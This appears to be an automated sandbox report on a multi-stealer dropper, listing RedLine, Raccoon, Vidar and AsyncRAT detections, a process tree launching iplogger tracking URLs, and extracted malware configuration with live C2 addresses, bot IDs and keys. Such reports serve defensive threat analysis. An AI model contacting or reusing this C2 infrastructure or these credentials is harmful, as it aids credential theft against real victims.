Edit tour

Windows Analysis Report
WSkT8d093C.exe

Overview

General Information

Sample Name:	WSkT8d093C.exe
Analysis ID:	688476
MD5:	e0118ad4299455683d5d0708772742ef
SHA1:	c80a27155317c3d08308cf8a55e4790f429bb2dd
SHA256:	6acec3474a2dcacc99fe7f6495d4e4e90adbb40de283054aadad2e8f91dbd115
Tags:	exeRecordBreaker
Infos:

Detection

AsyncRAT, CryptOne, Raccoon Stealer v2, RedLine, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected RedLine Stealer

Detected unpacking (overwrites its own PE header)

Yara detected CryptOne packer

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Yara detected AsyncRAT

Antivirus detection for dropped file

Snort IDS alert for network traffic

Yara detected Raccoon Stealer v2

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected Vidar stealer

Yara detected MSILDownloaderGeneric

Multi AV Scanner detection for dropped file

Connects to many ports of the same IP (likely port scanning)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Encrypted powershell cmdline option found

Machine Learning detection for sample

.NET source code contains potential unpacker

Found many strings related to Crypto-Wallets (likely being stolen)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Yara detected Generic Downloader

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Downloads executable code via HTTP

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

PE file contains strange resources

Drops PE files

Found evasive API chain checking for process token information

Checks if the current process is being debugged

Binary contains a suspicious time stamp

PE file contains more sections than normal

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

PE file contains sections with non-standard names

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Found dropped PE file which has not been started or loaded

PE file contains executable resources (Code or Archives)

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Is looking for software installed on the system

Queries information about the installed CPU (vendor, model number etc)

AV process strings found (often used to terminate AV products)

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

Extensive use of GetProcAddress (often used to hide API calls)

Detected TCP or UDP traffic on non-standard ports

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

WSkT8d093C.exe (PID: 6016 cmdline: "C:\Users\user\Desktop\WSkT8d093C.exe" MD5: E0118AD4299455683D5D0708772742EF)

chrome.exe (PID: 4872 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AEmX4 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 3232 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1980 --field-trial-handle=1812,i,13899178159324565324,4792733320013674352,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 4628 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5648 --field-trial-handle=1812,i,13899178159324565324,4792733320013674352,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 4604 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8796 --field-trial-handle=1812,i,13899178159324565324,4792733320013674352,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 6564 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8736 --field-trial-handle=1812,i,13899178159324565324,4792733320013674352,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 2996 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8076 --field-trial-handle=1812,i,13899178159324565324,4792733320013674352,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 5604 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8820 --field-trial-handle=1812,i,13899178159324565324,4792733320013674352,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 4688 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1ARmX4 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 6180 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1656 --field-trial-handle=1804,i,3887364631266855012,4134038574894975067,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 5312 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AAmX4 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 768 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1524 --field-trial-handle=1804,i,679818058755035571,9795757180626975896,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 628 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AFmX4 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 7184 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=1816,i,10820754821841865939,13631308242641258792,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 6188 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AGmX4 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 8076 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1972 --field-trial-handle=1744,i,4742277565187588249,3541242475859166172,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 6476 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AJmX4 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 8448 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2012 --field-trial-handle=1764,i,7966671234020085067,5591861156680508914,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 5788 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AKmX4 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 8196 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1560 --field-trial-handle=1848,i,16283781183909954720,11832735312998177263,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 7340 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AZmX4 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 8708 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1680 --field-trial-handle=1808,i,10803361475566917104,16647152247246369842,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 7508 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AVmX4 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 8868 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1944 --field-trial-handle=1748,i,13339803577015116151,3936802353163471100,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

F0geI.exe (PID: 7776 cmdline: "C:\Program Files (x86)\Company\NewProduct\F0geI.exe" MD5: 501E0F6FA90340E3D7FF26F276CD582E)

kukurzka9000.exe (PID: 5984 cmdline: "C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe" MD5: 3EC059BD19D6655BA83AE1E644B80510)

namdoitntn.exe (PID: 8632 cmdline: "C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe" MD5: BBD8EA73B7626E0CA5B91D355DF39B7F)

real.exe (PID: 8952 cmdline: "C:\Program Files (x86)\Company\NewProduct\real.exe" MD5: A2414BB5522D3844B6C9A84537D7CE43)

safert44.exe (PID: 9112 cmdline: "C:\Program Files (x86)\Company\NewProduct\safert44.exe" MD5: 414FFD7094C0F50662FFA508CA43B7D0)

jshainx.exe (PID: 9184 cmdline: "C:\Program Files (x86)\Company\NewProduct\jshainx.exe" MD5: 2647A5BE31A41A39BF2497125018DBCE)

brokerius.exe (PID: 4472 cmdline: "C:\Program Files (x86)\Company\NewProduct\brokerius.exe" MD5: F5D13E361F8B9ACA7103CB46B441034B)

captain09876.exe (PID: 8604 cmdline: "C:\Program Files (x86)\Company\NewProduct\captain09876.exe" MD5: CE94CE7DE8279ECF9519B12F124543C3)

SETUP_~1.EXE (PID: 7812 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE MD5: CE25658AC9291C713590B834D96406BB)

powershell.exe (PID: 8768 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA0AA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 8764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

ordo_sec666.exe (PID: 7560 cmdline: "C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe" MD5: 63FD052610279F9EB9F1FEE8E262F2A4)

ffnameedit.exe (PID: 8164 cmdline: "C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe" MD5: 3243054D3ACD513ABCC72EE1D1B65C97)

WW1.exe (PID: 6840 cmdline: "C:\Program Files (x86)\Company\NewProduct\WW1.exe" MD5: 86C2F03BBB61BDCAF1AE4BFB22CC2D31)

rundll32.exe (PID: 6888 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)

cleanup

Malware Configuration

Threatname: Raccoon

{"C2 url": ["http://193.56.146.177"], "Bot ID": "afb5c633c4650f69312baef49db9dfa4", "RC4_key1": "afb5c633c4650f69312baef49db9dfa4"}

Threatname: RedLine

{"C2 url": ["103.89.90.61:34589"], "Bot Id": "nam3", "Message": "Done", "Authorization Header": "64b900120bbceaa6a9c60e9079492895"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Program Files (x86)\Company\NewProduct\safert44.exe	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1c60:$pat14: , CommandLine: 0x25b6b:$v2_1: ListOfProcesses 0x25920:$v4_3: base64str 0x265de:$v4_4: stringKey 0x23fa6:$v4_5: BytesToStringConverted 0x23080:$v4_6: FromBase64 0x24537:$v4_8: procName 0x24867:$v5_1: DownloadAndExecuteUpdate 0x257f7:$v5_2: ITaskProcessor 0x24855:$v5_3: CommandLineUpdate 0x24846:$v5_4: DownloadUpdate 0x24cbd:$v5_5: FileScanning 0x241cd:$v5_7: RecordHeaderField 0x23e0e:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
C:\Program Files (x86)\Company\NewProduct\safert44.exe	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0x26610:$a1: get_encrypted_key 0x25cb8:$a2: get_PassedPaths 0x245af:$a3: ChromeGetLocalName 0x25ec9:$a4: GetBrowsers 0x19f0:$a5: Software\Valve\SteamLogin Data 0x1290:$a6: %appdata%\ 0x259b4:$a7: ScanPasswords
C:\Program Files (x86)\Company\NewProduct\WW1.exe	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x38f18:$a2: wallet.dat 0x393a9:$b1: CC\%s_%s.txt 0x390a9:$b2: History\%s_%s.txt 0x39095:$b3: Autofill\%s_%s.txt
C:\Program Files (x86)\Company\NewProduct\brokerius.exe	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x39138:$a2: wallet.dat 0x395c1:$b1: CC\%s_%s.txt 0x392c9:$b2: History\%s_%s.txt 0x392b5:$b3: Autofill\%s_%s.txt
C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x19c9c:$pat14: , CommandLine: 0x12cd0:$v2_1: ListOfProcesses 0x12a90:$v4_3: base64str 0x136cb:$v4_4: stringKey 0x1123f:$v4_5: BytesToStringConverted 0x1033a:$v4_6: FromBase64 0x117b2:$v4_8: procName 0x11ac8:$v5_1: DownloadAndExecuteUpdate 0x12967:$v5_2: ITaskProcessor 0x11ab6:$v5_3: CommandLineUpdate 0x11aa7:$v5_4: DownloadUpdate 0x11ea8:$v5_5: FileScanning 0x11460:$v5_7: RecordHeaderField 0x110c8:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0x136fd:$a1: get_encrypted_key 0x12dff:$a2: get_PassedPaths 0x1182a:$a3: ChromeGetLocalName 0x13000:$a4: GetBrowsers 0x19a2c:$a5: Software\Valve\SteamLogin Data 0x192cc:$a6: %appdata%\ 0x12b24:$a7: ScanPasswords
C:\Program Files (x86)\Company\NewProduct\jshainx.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Program Files (x86)\Company\NewProduct\jshainx.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Program Files (x86)\Company\NewProduct\jshainx.exe	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x19ca8:$pat14: , CommandLine: 0x12ccd:$v2_1: ListOfProcesses 0x12a8d:$v4_3: base64str 0x136d1:$v4_4: stringKey 0x1123f:$v4_5: BytesToStringConverted 0x1033a:$v4_6: FromBase64 0x117b2:$v4_8: procName 0x11ac8:$v5_1: DownloadAndExecuteUpdate 0x12964:$v5_2: ITaskProcessor 0x11ab6:$v5_3: CommandLineUpdate 0x11aa7:$v5_4: DownloadUpdate 0x11eab:$v5_5: FileScanning 0x11460:$v5_7: RecordHeaderField 0x110c8:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0x13703:$a1: get_encrypted_key 0x12dfc:$a2: get_PassedPaths 0x1182a:$a3: ChromeGetLocalName 0x13006:$a4: GetBrowsers 0x19a38:$a5: Software\Valve\SteamLogin Data 0x192d8:$a6: %appdata%\ 0x12b21:$a7: ScanPasswords
C:\Program Files (x86)\Company\NewProduct\real.exe	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x372e4:$a2: wallet.dat 0x37701:$b1: CC\%s_%s.txt 0x37475:$b2: History\%s_%s.txt 0x37461:$b3: Autofill\%s_%s.txt
C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Click to see the 9 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000025.00000002.788201136.00000000010EA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000002.443247307.00000000004E8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x4705:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000014.00000003.362733607.0000000000520000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000021.00000002.787632512.000000000081A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001A.00000000.343257573.00000000002F2000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000001A.00000000.343257573.00000000002F2000.00000002.00000001.01000000.00000009.sdmp	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0x13301:$a1: get_encrypted_key 0x12a03:$a2: get_PassedPaths 0x1142a:$a3: ChromeGetLocalName 0x12c04:$a4: GetBrowsers 0x19628:$a5: Software\Valve\SteamLogin Data 0x18ec8:$a6: %appdata%\ 0x12728:$a7: ScanPasswords
0000001F.00000000.356865696.00000000003F3000.00000002.00000001.01000000.0000000E.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000001F.00000000.356865696.00000000003F3000.00000002.00000001.01000000.0000000E.sdmp	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0x2303:$a1: get_encrypted_key 0x19fc:$a2: get_PassedPaths 0x42a:$a3: ChromeGetLocalName 0x1c06:$a4: GetBrowsers 0x8638:$a5: Software\Valve\SteamLogin Data 0x7ed8:$a6: %appdata%\ 0x1721:$a7: ScanPasswords
00000014.00000003.327739164.00000000005D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000014.00000003.369772118.0000000000520000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000001.00000003.272716591.0000000003A60000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000001.00000003.272716591.0000000003A60000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0x8e511:$a1: get_encrypted_key 0x8dc13:$a2: get_PassedPaths 0x8c63e:$a3: ChromeGetLocalName 0x8de14:$a4: GetBrowsers 0x94840:$a5: Software\Valve\SteamLogin Data 0x940e0:$a6: %appdata%\ 0x8d938:$a7: ScanPasswords
00000001.00000003.272716591.0000000003A60000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Vidar_114258d5	unknown	unknown	0xce92c:$a2: wallet.dat 0xcedbd:$b1: CC\%s_%s.txt 0xceabd:$b2: History\%s_%s.txt 0xceaa9:$b3: Autofill\%s_%s.txt
00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000023.00000003.402495407.0000000002291000.00000040.00000800.00020000.00000000.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x6e:$xo1: _cbx+{ydlyjf+hjeed\x7F+in+y~e+be+ODX+fdon
00000014.00000002.449217008.000000000050B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000021.00000002.795622343.0000000000D14000.00000002.00000001.01000000.0000000F.sdmp	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x6b38:$a2: wallet.dat 0x6fc1:$b1: CC\%s_%s.txt 0x6cc9:$b2: History\%s_%s.txt 0x6cb5:$b3: Autofill\%s_%s.txt
0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.334532236.000000000054D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
0000001D.00000000.347251788.0000000000FF3000.00000002.00000001.01000000.0000000C.sdmp	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x56e4:$a2: wallet.dat 0x5b01:$b1: CC\%s_%s.txt 0x5875:$b2: History\%s_%s.txt 0x5861:$b3: Autofill\%s_%s.txt
00000014.00000003.333075740.0000000000523000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.346306423.0000000000521000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
0000001E.00000000.351377883.0000000000C92000.00000002.00000001.01000000.0000000D.sdmp	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0x26410:$a1: get_encrypted_key 0x25ab8:$a2: get_PassedPaths 0x243af:$a3: ChromeGetLocalName 0x25cc9:$a4: GetBrowsers 0x17f0:$a5: Software\Valve\SteamLogin Data 0x1090:$a6: %appdata%\ 0x257b4:$a7: ScanPasswords
00000024.00000000.371239903.0000000000153000.00000002.00000001.01000000.00000014.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000024.00000000.371239903.0000000000153000.00000002.00000001.01000000.00000014.sdmp	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0x22fd:$a1: get_encrypted_key 0x19ff:$a2: get_PassedPaths 0x42a:$a3: ChromeGetLocalName 0x1c00:$a4: GetBrowsers 0x862c:$a5: Software\Valve\SteamLogin Data 0x7ecc:$a6: %appdata%\ 0x1724:$a7: ScanPasswords
0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000014.00000003.382819718.0000000000520000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000014.00000003.368157732.000000000051E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001D.00000002.795454230.0000000000FF3000.00000002.00000001.01000000.0000000C.sdmp	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x56e4:$a2: wallet.dat 0x5b01:$b1: CC\%s_%s.txt 0x5875:$b2: History\%s_%s.txt 0x5861:$b3: Autofill\%s_%s.txt
00000025.00000000.377440161.00000000012D3000.00000002.00000001.01000000.00000015.sdmp	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x6b18:$a2: wallet.dat 0x6fa9:$b1: CC\%s_%s.txt 0x6ca9:$b2: History\%s_%s.txt 0x6c95:$b3: Autofill\%s_%s.txt
00000014.00000002.442092105.00000000004C0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000014.00000002.442092105.00000000004C0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000014.00000003.333063165.0000000000517000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000014.00000003.360540349.0000000000520000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Crypt	Yara detected CryptOne packer	Joe Security
00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000014.00000003.334542606.0000000000523000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000025.00000002.792118576.00000000012D3000.00000002.00000001.01000000.00000015.sdmp	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x6b18:$a2: wallet.dat 0x6fa9:$b1: CC\%s_%s.txt 0x6ca9:$b2: History\%s_%s.txt 0x6c95:$b3: Autofill\%s_%s.txt
00000021.00000000.360138360.0000000000D14000.00000002.00000001.01000000.0000000F.sdmp	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x6b38:$a2: wallet.dat 0x6fc1:$b1: CC\%s_%s.txt 0x6cc9:$b2: History\%s_%s.txt 0x6cb5:$b3: Autofill\%s_%s.txt
Process Memory Space: namdoitntn.exe PID: 8632	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: namdoitntn.exe PID: 8632	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: real.exe PID: 8952	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: real.exe PID: 8952	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: real.exe PID: 8952	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x6bdd5:$a1: BinanceChainWallet 0x64dfa:$a2: wallet.dat 0x83038:$a2: wallet.dat 0x65721:$b1: CC\%s_%s.txt 0x6575a:$b1: CC\%s_%s.txt 0x8395f:$b1: CC\%s_%s.txt 0x83998:$b1: CC\%s_%s.txt 0x654ab:$b2: History\%s_%s.txt 0x65589:$b2: History\%s_%s.txt 0x836e9:$b2: History\%s_%s.txt 0x837c7:$b2: History\%s_%s.txt 0x65497:$b3: Autofill\%s_%s.txt 0x65576:$b3: Autofill\%s_%s.txt 0x836d5:$b3: Autofill\%s_%s.txt 0x837b4:$b3: Autofill\%s_%s.txt
Process Memory Space: safert44.exe PID: 9112	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: safert44.exe PID: 9112	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: jshainx.exe PID: 9184	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: jshainx.exe PID: 9184	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: brokerius.exe PID: 4472	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: brokerius.exe PID: 4472	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
